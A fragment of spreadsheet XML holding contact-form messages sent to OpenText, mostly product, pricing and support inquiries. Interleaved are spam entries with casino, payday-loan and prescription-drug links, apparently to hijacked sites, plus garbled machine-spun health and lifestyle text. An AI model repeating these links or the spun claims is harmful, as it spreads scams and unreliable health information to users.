•   Owners and many more. _x000D_
_x000D_
List includes: Contact Details and Verified Email Addresses of- All Key Decision makers List, All C-level executives List across USA, UK, Canada, Australia, Asia and other countries._x000D_
_x000D_
Let me know your target audience, I can get back to you with updated information for your review._x000D_
_x000D_
Users (Example: EBSuite, Lansa, Oracle):  _x000D_
Target Geography   :  _x000D_
Target Job Title        :  _x000D_
_x000D_
Appreciate your time &amp; look forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Rosy Wilson| Business Development Executive</t>
  </si>
  <si>
    <t>Cant login to support, password is correct. need to download recent purchase</t>
  </si>
  <si>
    <t>Hello, we have a client that uses RightFax and we'd like to find out if you have professional services to help us upgrade software versions or migrate to a new hardware platform?</t>
  </si>
  <si>
    <t>Inquiry of RightFax services connection with Netsmart Homecare for multi-site home health agencies.</t>
  </si>
  <si>
    <t>I work for the US Department of Justice, Executive Office for United States Attorneys (EOUSA).  EOUSA supports the 94 United States Attorneys' Offices (USAOs) located across the US and its territories.  The USAOs do not currently have an enterprise document management system.  I am performing preliminary, exploratory market research regarding document management systems.  I am interested in information regarding OpenText Content Suite.  Can you please provide user guides for Content Suite?  Thanks.</t>
  </si>
  <si>
    <t>Want ECM K9 for Nissan Rogue 2008</t>
  </si>
  <si>
    <t>Need to know the name and contact information for the AE that would handle Content Management for Chicago IL</t>
  </si>
  <si>
    <t>We are currently running Teleform version 10.9.2 with a Fujitsu FI-6670A scanner. We are interested in upgrading in the near future and would like more information. Can we please schedule a call for next week?</t>
  </si>
  <si>
    <t xml:space="preserve">fax to EDI to deliver orders to our vendors </t>
  </si>
  <si>
    <t>We are possibly interested in your Fax2Mail product.</t>
  </si>
  <si>
    <t>I'm currently working for a biotech, and we're exploring using PleaseReview together with Veeva Vault. Would you have any examples you could share? Why use PleaseReview in addition to Veeva Vault rather than just VeevaVault for example? If used together how well they'd integrate? Etc.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]cassino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>I would like to know how can i become your distributor and partner in Egypt, waiting for your reply.</t>
  </si>
  <si>
    <t>Need for intern</t>
  </si>
  <si>
    <t>I am trying to register a new database (a very old .dbs file) and I get an error 437, basically an invalid country.sql file.  The .dbs file is the only thing I have from the original version of sqlbase, I do not even know what version it is, can you help?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.primaryothersmusic.com/assets/img/Preshow.asp?paaa=506-Viagra-Generika-Rezeptfrei-Schweiz-Kamagra-Schweiz-Kaufen-Viagra-Preisvergleich-Rezeptfrei/]Viagra Generika Rezeptfrei Schweiz[/url]_x000D_
 A terrific way to slim down is usually to bring a pair of earphones to the gym to help you view t . v . as you may perform cardio. This straightforward distraction will make cardio far more tolerable and you'll even be knowledgeable of recent situations in case the reports is on. You'll likewise be able to carry out much longer._x000D_
  [url=http://www.ptspro.ru/content/back.php?test=156-Ansomone-For-Sale-Hgh-Fragment-176-191-Benefits-Human-Growth-Hormone-Supplements.html]Ansomone For Sale[/url]_x000D_
 A persons papillomavirus, or HPV, can be a reason behind cervical many forms of cancer. This malware leads to genital warts, that happen to be transported by sex get in touch with. The only way to prevent the distributed of HPV is using condoms and abstinence, or perhaps a vaccine that protects from the sickness. Be sensible and don't practice unprotected sexual intercourse. The possibility of cancer isn't really worth the risk._x000D_
  [url=http://www.gallerykids.ru/Images/text.asp?cid=171-Ansomone-Uk-Muscle-Hygetropin-Uk-Price-Hgh-Fragment-176-191]Ansomone Uk Muscle[/url]_x000D_
 If you want to create more muscle tissue, make an effort to do significantly less repetitions of heaver weight loads. You will have to boost your body weight slowly and make an effort to raise the biggest that you just are able to for no less than 5 repetitions. When you can existence for 5 reps, it really is time for you to improve weight load._x000D_
  [url=http://www.betomoraes.com.br/contato/form.asp?waaa=494-Viagra-Generika-Kamagra-Jelly-Schweiz-Viagra-Apotheke-ZÃ¼rich]Viagra Generika[/url]_x000D_
</t>
  </si>
  <si>
    <t>Do you have any information on successfully running Vignette Portal 7.3 on JBoss EAP 7 (or higher)?  Thank you.</t>
  </si>
  <si>
    <t>Researching DAM Companies</t>
  </si>
  <si>
    <t>Course Registration and Payment Options</t>
  </si>
  <si>
    <t>Unable to open support ticket.  Receive no access, request confirmation email. Followed those instructions and still do not have access</t>
  </si>
  <si>
    <t>Pricing Information about Open Text Document Management for a legal firm</t>
  </si>
  <si>
    <t>I'm using Blue Prism software to launch opentext and login to a mainframe emulator. Each time I launch it, the emulator is minimized. Is there any setting change I can make to ensure it doesn't?</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casinos online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]slot online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot online&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi,_x000D_
Greetings!!_x000D_
I am a reseller in India. One of my client is looking below mention product._x000D_
OpenText Exceed 15_x000D_
Qty.-1_x000D_
Please share the reseller and endcustomer price.</t>
  </si>
  <si>
    <t>Hello, our Company is interested in opentext vendor invoice management and would like to receive a demo of this solution.  could you please contact me to arrange?  thank you in advance.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot game[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t xml:space="preserve">We are India’s one of the leading Interior Fit out Organisation. We specialize in General Contracting towards Interior related works ( Corporate Workplace)._x000D_
_x000D_
We are highly interested to work with your esteemed organisation._x000D_
_x000D_
We are looking forward for a meeting and the association with your esteemed company. _x000D_
_x000D_
Please revert us back so that we can have further discussion on the various services offered by Organisation_x000D_
_x000D_
We are India’s one of the leading Interior Fit out Organisation. We specialize in General Contracting towards Interior related works ( Corporate Workplace)._x000D_
_x000D_
We are highly interested to work with your esteemed organisation._x000D_
_x000D_
We look forward for a meeting and the association with your esteemed company. _x000D_
_x000D_
We are India’s one of the leading Interior Fit out Organisation. We specialize in General Contracting towards Interior related works ( Corporate Workplace)._x000D_
_x000D_
We are highly interested to work with your esteemed organisation._x000D_
_x000D_
We look forward for a meeting and the association with your esteemed company. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir wollen für einen Kunden mit Streamserve eine Anwendung entwickeln. _x000D_
Ist es möglich eine Lizenz nur für die Entwicklung zu erwerben und wie sieht da das Preismodell aus?_x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Michael Lück</t>
  </si>
  <si>
    <t>Hi - created a new account today, however the authentication link in the confirmation email is failing ?  Can you advise please._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi, I´m using Free DWG Viewer for very sporadic use of viewing DWG drawings and the program has stopped working because it´s reached the end date for use (2018-02-18). _x000D_
Why have you not renewed the program? If I download it today it´s still the outdated version that will be downloaded.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!  My friend will be visiting your clinic for Work Permit renewal medical examination.  She wants to  know whether she need to fast on the night before the examination. Can you advise?  Thank you. </t>
  </si>
  <si>
    <t>-Does EasyLink Fax2Mail supports SAML SSO?_x000D_
-Does EasyLink Fax2Mail supports oAuth or OpenID?_x000D_
-Does free trial supports SAML SSO?_x000D_
If free trial does not support SAML, could you please let us know the pricing details along with Terms and conditions of purchase?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.astecconstrucoes.com.br/state/box.asp?m=8]Buy Jintropin Online[/url]_x000D_
 A great idea for improving your recollection with new items that are not familiar for you is actually by associating these with things you are currently informed about. An example would be to remember somebody's brand by contemplating somebody else you know that appears similar to them or gives some important attribute._x000D_
  [url=http://www.jhstucco.com/admin/login.php?p=Kamagra-Oral-Jelly-Schweiz-Viagra-100-Wirkung-Viagra-FÃ¼r-Mann-240.html]Kamagra Oral Jelly Schweiz[/url]_x000D_
 Know your tax requirements. Federal government taxation will continue to make you purchase Societal Protection and Insurance plan, to suit your needs along with any workers you could have aboard. Since you are considered a company, you are able to decide to shell out a lot more to your retirement life or medical care benefits if you want._x000D_
  [url=http://www.vitaral.com.tr/header/class.asp?ffff=75]Hygetropin Hgh Side Effects[/url]_x000D_
 Discover ways to change your inhaling and exhaling to quit nervousness. As an alternative to breathing with the chest, make use of belly to adopt further breaths together with your diaphragm. This type of breathing slows down your pulse rate, calms the body, and will help you are feeling significantly less anxious. This is efficient whenever you sense an anxiety attack emerging on, also it can also assist you to unwind and get to sleep through the night._x000D_
  [url=http://www.marlik-hidalu.com/far/access.asp?fa=608-Viagra-Femme-Gold-Max-Acheter-Kamagra-En-Belgique-Viagra-Prix-France]Viagra Femme Gold Max[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are looking for solution/application which integrate with our SAP system &amp; gives solution for our organization need of document management system, sales team field transaction with CRM &amp; vendor portal solution with workflow facility.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot game[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]best online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online gambling casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot online&lt;/a&gt;</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casinogameslistonline.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Hi Opentext Team,_x000D_
_x000D_
My name is Andreas, technical consultant from PT. Nusantara Compnet Integrator._x000D_
I want to know about Opentext product, Right Fax. Is your product based of software or hardware/appliances? If it's based on software, can you explain to us the installation platform/the hardware specification needed? Also, can you include more information and datasheet regarding Rightfax? _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino slots[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Request for a quotation for the LIvelink licenses_x000D_
1) Record Management (Including Objects and Security clearance._x000D_
-Product code  S-LLRMGT  X150_x000D_
2) Livelink Security cearance module_x000D_
- Product code S-LLRMSECURITY   X2_x000D_
3) Collaboration Full Name Users_x000D_
-Product code S-LLPGECMCLB  X150_x000D_
4) Remote Catche_x000D_
-Product code S-LLCATCHE   X150_x000D_
5)Livelink for document management_x000D_
-Product code  S-LLGDM_x000D_
6) BPM Web Process Manager_x000D_
-Product code  S-IXSPRCSINTRANET  X150_x000D_
7) Support Period for one (1) year  X1_x000D_
 </t>
  </si>
  <si>
    <t>We are looking at replacing a legacy high-volume scanning/OCR/ICR solution at a government customer. 7m+ documents per annum. Four handwritten structured forms plus various associated unstructured documents. Target for scanned forms is the customer's bespoke Case Management system.</t>
  </si>
  <si>
    <t xml:space="preserve">Job  opportunities </t>
  </si>
  <si>
    <t>I am looking for B2B Managed Services.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games real money[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino slots[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casinos online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>Друзья, если вы решили научиться правильно выбирать меховые товары и кожу, то приучитесь к мысли, что основным судьей в таком деле будет ваш нос. Запахи – это основной, безошибочный метод проверки качества, подробнее читайте на сайте [url=http://womanmaniya.ru]womanmaniya.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote for 6 copies each of _x000D_
1) S-EXMPI556101M-KIT-0	    OPENTEXT EXCEED power suite bundle &amp; 1 yr maint_x000D_
and 									_x000D_
2)  S-SPMPI570101M-0	OPENTEXT SOFTWARE SECURE SHELL SING LIC &amp; 1 r maint											_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.arslanplast.com.tr/hispanel/cache.php?ye=48]Ukrainian Jintropin[/url]_x000D_
 Now you must some very nice guidance and knowledge on the subject of diet. Know tips on how to combine these pointers in your personal daily life and the way to have more healthy eating routine. In this way, you may be more likely to stave off health problems, sickness, and also other bodily ailments that normally feature bad nourishment.Ways Concerning How To Acquire Far better Images_x000D_
  [url=http://www.fundrive.co.il/care/component.asp?banner=35-Kigtropin-Reviews-Igtropin-Side-Effects-Hgh-Fragment]Kigtropin Reviews[/url]_x000D_
 The majority of people take pleasure in coupling vino by using a extravagant meal. Nevertheless, it really is imperative that you always select the right flavorful jar of wine that you can afford to pay for. People usually don't know that wine could make or crack the standard of the dinner. If in uncertainty, it's best if you don't!_x000D_
  [url=http://www.alomdahpastry.com/engine/arrows.asp?ap=55-Viagra-Naisille,Viagra-50-Mg,Viagra-Korvaava-LÃ¤Ã¤ke]Viagra Naisille[/url]_x000D_
 Should you referred to as an individual and never recall their variety or when you referred to as them, click the "recents" key in the cell phone section. This key will not only give you a selection of your latest cell phone calls along with their periods, and also allow you to remove these contact logs or look at the missed telephone calls._x000D_
  [url=http://www.stmarysmumbai.com/wp-content/iluert.asp?max=59]Cialis Generika Billig[/url]_x000D_
</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://casinogameslistonline.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games real money&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.shalyakhospital.com/libraries/state.php?y=75]Hgh Belgique[/url]_x000D_
 Make sure that the dealer that you use is a experienced negotiator. It will take an incredibly skilled negotiator to obtain the hottest deal in the business real estate market. Question them the way they prepare, what tactics they use and precisely what the results are which they seek. Get an example of an effective negotiation._x000D_
  [url=http://www.indrel.com.br/Content/form.php?p=128]Cialis Pharmacie France[/url]_x000D_
 Since you now know a little bit more about how to integrate wine into your life, it's time to begin. Probably you need to pick the best red wine in your following time, or you would like to start your own wines collection. Now you need to have a wise idea with regards to how to go about carrying out that.Simple Things You Must Stay away from When Struggling With Allergic reaction_x000D_
  [url=http://www.mpcit.com.ar/mail/contact.php?jaaa=170-Viagra-Receptfritt-KÃ¶pa-Viagra-PÃ¥-NÃ¤tet-Lagligt-KÃ¶pa-Viagra-Receptfritt.html]Viagra Receptfritt[/url]_x000D_
 If you realise entire body acne breakouts an issue, make sure you exfoliate your skin layer. Pores can be impeded with the body's normal natural oils, as a result resulting in irritating pimples to form. To remove dead skin cells and make certain the pores continue to be crystal clear, consider some lighting scrubbing having an exfoliating rub or smooth brush. You'll be very impressed with the final results!_x000D_
  [url=http://www.hrcentraloregon.org/Images/client.asp?p=17-Kamagra-100-Gold-Kamagra-Gold-Italia-Kamagra-Oral-Jelly-Assunzione/]Kamagra 100 Gold[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.konfeksiyonprogrami.com/images/error.asp?bur=129]Hgh Fragment 176 191 Como Tomar[/url]_x000D_
 Leaving comments on other blog sites is among the guidelines on how to generate traffic to your blog. In the event you go through a fascinating article, compose a engaging opinion that provides a unique point of view. Incorporate a hyperlink to your website. The people who read your review will likely would like to read more of what you need to say, and will visit your blog site._x000D_
  [url=http://www.piterland.ru/Images/banner.asp?ci=233]Hgh Frag Mixing 5 Mg[/url]_x000D_
 Shuttling your kids from spot to place inside your auto will get stressful, especially if you encounter unavoidable targeted traffic slow downs. You can keep your kid's aggravation in balance simply by making confident your vehicle is well-filled using their favorite music. A Disc of kid-friendly music helps keep a traffic jam from turning into an ordeal._x000D_
  [url=http://www.cottleaf.com/css/session.asp?f=349-Levitra-Forum-Cialis-Farmacia-Online-Sicura-Viagra-Farmacia-Prezzo]Levitra Forum[/url]_x000D_
 Traveling with an organization? Try to give up on where to consume and which place to go. If you want to be selfish, the other team will resent you for leading to them to get a terrible time. By diminishing, most people are happy sooner or later and you are required to try and practical experience interesting things._x000D_
  [url=http://www.vivacioussolution.com/css/publish.asp?u=442]Generico Viagra Online[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I am planning for a opentext certification on opentext VIM &amp; ICC. Please let me know the process for this. Also will there be any Trainings by opentext for certification and any Documentation?_x000D_
_x000D_
Thanks,_x000D_
Vidhur</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.g1.co.th/feed/liret.asp?m=121]Generic Cialis Online[/url]_x000D_
 If youngsters will likely be coming together on a camping outdoors vacation, be sure to load numerous products to ensure they are interested in the course of straight down-instances and at night. Enjoying credit cards, board games, document and crayons and scenario guides could keep them from being fed up a long time after the campfire has been put out._x000D_
  [url=http://login.mediatech.be/sitemap/flash.asp?kabro=60]Cialis GÃ©nÃ©rique En Pharmacie Belgique[/url]_x000D_
 If you want dollars for school, you should consider looking for federal financial aid and scholarship grants. Visit the FAFSA website and keep to the app procedure to gain access to federal financing or grants or loans. If you are denied federal backing, make an application for different scholarships or grants relevant to the topic you would like to study._x000D_
  [url=http://www.muvpilates.com.br/img/achieve.php?k=hgh-for-sale-usa-kigtropin-for-sale-usa-hgh-injections-for-sale-south-africa-315]hgh for sale usa[/url]_x000D_
 When considering time to to start searching for solution for your depression, you could possibly question how to begin. There are many things to consider when figuring out which route to choose to adopt to begin feeling far better. The ideas in this post can present you with what you need to know to be able to begin speaking about treatment method together with your medical doctor._x000D_
  [url=http://www.serensa.nl/wp-content/move.php?s=133-Pillenpharm-Cialis,Cialis-Bestellen,Cialis-Generique/]Pillenpharm Cialis[/url]_x000D_
</t>
  </si>
  <si>
    <t>Ricoh MFP integration</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogameslistonline.com/]casino online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>In this 1 week back open the internship of 2017 batch,any vacanices are open,_x000D_
i want that internship please try understand,please send me that link.</t>
  </si>
  <si>
    <t xml:space="preserve">My fax number is 951-565-4526 and my statements are not available to view or print, etc. Why not? I need to access them to submit an expense report. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm Shoaib Ali CEO of the Tech Based Startup called IoTSky, we are currently based in Pakistan, and now we are planning to operate in the UK as well, wanted to know about the requirements on how to register and what would be the process for us to be the part of this event_x000D_
_x000D_
Waiting for a Positive Response._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
_x000D_
Shoaib Ali_x000D_
IoTSky</t>
  </si>
  <si>
    <t>Evaluate BIRT</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to be connected with someone that can help me set up an account so I can use the catalog. Thank you </t>
  </si>
  <si>
    <t>Interested in purchase of "open text" file sharing capabilities. Can some on contact me to show me a demo.</t>
  </si>
  <si>
    <t>Последние новости андроид здесь [url=http://hi-android.net/]hi-android.net[/url]</t>
  </si>
  <si>
    <t>Pricing.  And server support.  I am researching reporting for a customer solution.  I have started off with open source BIRT, but we are considering the additional features gained from using the OpenText product line.  I downloaded the trial but that is a windows executable, I am hosting currently on linux and use a Mac for development.</t>
  </si>
  <si>
    <t>looking into cloud fax solutions</t>
  </si>
  <si>
    <t>ticket#3428785. we spoke with support and told them about our issue. we received an email with a link to sign in to OpenText. sign in...now what????? how is this supposed to fix our issue???????</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t xml:space="preserve">Does Opentext carry any Document Management solutions that might help us out with the following requirements?_x000D_
_x000D_
Requirements_x000D_
_x000D_
•	One of our clients is responsible for generating and displaying documents for their company. Currently these documents are printed out and placed in a display case close to the main entrance of company.  _x000D_
However, there are weeks were there can be several documents – too many to fit in the display case.  _x000D_
_x000D_
•	They would like to explore the possibility of electronically displaying the documents and being able to generate them very easily._x000D_
</t>
  </si>
  <si>
    <t>Hi All, Would you be able to provide a renewal quote for the Arizona State Retirment System? _x000D_
RightFax Express CG 8 channels_x000D_
Unique #: 76194-12255 Unique Name: 76194-12255_x000D_
S-CPFA0259KIT_x000D_
_x000D_
They need to renew through CDW-G in order to utilize a state contract. _x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently a computer/electronic supplier in Trinidad and would like to provide a quote for one of my clients, whom requested the following:_x000D_
_x000D_
1.	One (1) Teleform Workgroup License_x000D_
_x000D_
Modules_x000D_
_x000D_
One (1) Teleform Verifier_x000D_
One (1) Teleform Scan Station_x000D_
One (1) Teleform Reader_x000D_
One (1) Teleform Designer_x000D_
One (1) Teleform AutoMerge Publisher_x000D_
One (1) Teleform Monitor_x000D_
_x000D_
Licence Duration_x000D_
One (1) year_x000D_
_x000D_
2.	Additional Teleform Licenses_x000D_
_x000D_
Modules_x000D_
_x000D_
One (1) Teleform Verifier_x000D_
One (1) Teleform Scan Station_x000D_
_x000D_
Licence Duration_x000D_
One (1) year_x000D_
</t>
  </si>
  <si>
    <t>looking for an OEM relationship for content management solution to integrate into our EMR software.  Functionality includes - scan (both single and batch scanning), web based viewer, retrieval, and batch export for disclosure management.</t>
  </si>
  <si>
    <t xml:space="preserve">A question came up from my sales team regarding OpenText support plans for AIX and Linux on Power.  Which products support latest AIX release and which products will support Linux on Power?  If a product is not supported, what process would you like the sales team and/or customer to use to submit a requirement for that support.  thanks.  </t>
  </si>
  <si>
    <t>can't get onto gxs catalog   LM255B</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t xml:space="preserve">I just applied for a position in Opentext and I was referred to the role by a current Opentext employee. I wanted to make sure it was noted as apart of my application. Thank you. </t>
  </si>
  <si>
    <t>We would like to be EDI compliant</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are currently looking to obtain a single tool to assist with content management, including the ability to view and sign documents electronically.  We have view and read your documentation available online and would like to schedule a demo of OpenText Brava.  _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Good day, we have write several letter to make an inquiries about your fax service till this hour no any respond yet, still await your promp respond_x000D_
_x000D_
William Vickery_x000D_
Marlborough Plastics, Inc._x000D_
350 North Main Street_x000D_
Marlborough, CT 06447_x000D_
Phone: 860-406-5534_x000D_
Fax:   860-406-5538_x000D_
www.marlboroughplastics.com</t>
  </si>
  <si>
    <t>Looking for AX Administrator class for AX version 16</t>
  </si>
  <si>
    <t>To know where and who can i report the security vulnerabilities in Documentum.</t>
  </si>
  <si>
    <t>Request for Assai Software License Price and Annual Maintenance Cost.</t>
  </si>
  <si>
    <t>Looking for a product that will reside on a Print Server that will take any documents in the print queue and either print the results to a file, or email an email address.  We are going to be a MEDITECH shop (Health Information System) and would like this type of a "virtual" printer setup on our MEDITECH print servers.</t>
  </si>
  <si>
    <t>OTTV not responding to forgotten password unable to raise a ticket</t>
  </si>
  <si>
    <t>We have purchased a volume license for Brava Desktop, but we now find that we would like to mass convert a number of CAD files to TIFF images.  We understand that the Brava Batch tool can do this, and that it's functionality will be included in the v16.4 of Brava Desktop sometime in the next month or two.  If that's true, we unfortunately need more immediate access to the Brava Batch functionality.  I'd like to get a single license of the Brava Batch tool, but $240 seems steep for a 1-2 month use.  Can we get a single license for that for free?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.columbuscopeland.com/admin/office.asp?uuy=63-Viagra-For-Sale-Cork-Viagra-Dosage-Viagra-Original-Online/]Viagra For Sale Cork[/url]_x000D_
 Remember that the hue of your vino may not be exactly like colour of the grapes that are utilized to ensure it is. The color comes from the procedure of wines creating and it is the facial skin in the grape used along the way that gives an individual wines its closing color._x000D_
  [url=http://www.northstarpaintingmn.com/Scripts/book.php?z=42.html]Kamagra Pharmacie Belgique[/url]_x000D_
 There is no problem with receiving a small sympathy from the loved ones to assist you from the hard patches with joint disease. They can be a shoulder joint to cry on, take foods or do your shopping for you, as well as a aiding palm into the bathtub for the hot bath in no way injured._x000D_
  [url=http://www.arnoimoveis.com/access/class.php?pagina=380]igf 1 results[/url]_x000D_
 By no means use obtained funds to industry in currency trading! The money you make use of has to be entirely open to be dropped, so when you add it in to the market you won't be set up into terrible straits in the event you lose it. Even if you feel some thing can be a positive factor, it could generally convert towards you._x000D_
  [url=http://www.mallku.org.pe/image/backup.asp?o=sitemap?o=20-Comprare-Viagra-Originale]Viagra-50-Mg-Durata[/url]_x000D_
</t>
  </si>
  <si>
    <t>Interested in a MFT solution, integrated to Outlook</t>
  </si>
  <si>
    <t>Fisheries and Oceans Canada has purchased an upgrade license of Centura (Team Developer) for me.  We currently use version 1.5.  We need to upgrade to 7.0.  I've been told to download and install 6.0 then upgrade to 7.0.  I can't find where to get the 6.0 download.  Could you send me the link.  My license number is 62-9001-7000?_x000D_
_x000D_
thanks_x000D_
Debbie</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir greetings from A.T.Nagaraja._x000D_
_x000D_
Kindly have a look fallowing the company providing very small price trip, Luxury trip with much more benefits._x000D_
_x000D_
 https://royalholidayz.com/domestic.php_x000D_
_x000D_
https://royalholidayz.com/international.php_x000D_
_x000D_
If will you decide to give trip to your employees kindly reply to us._x000D_
_x000D_
I will help you._x000D_
_x000D_
Regards._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with someone to understand whether you have an API that would allow us to scan from our multifunction devices into your Redact-It cloud service, if you have a cloud-based version._x000D_
_x000D_
_x000D_
